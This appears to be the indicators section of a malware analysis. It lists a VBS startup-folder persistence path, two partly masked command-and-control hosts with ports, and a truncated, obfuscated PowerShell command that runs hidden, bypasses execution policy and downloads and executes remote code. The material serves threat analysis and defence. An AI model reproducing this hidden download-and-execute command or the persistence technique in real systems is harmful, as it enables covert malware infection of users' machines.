Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.vbs
- 'gi##.###hubusercontent.com':443
- 'ne#.###ya2020.com.ly':1414
- DNS ASK gi##.###hubusercontent.com
- DNS ASK ne#.###ya2020.com.ly
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+'...' (with hidden window)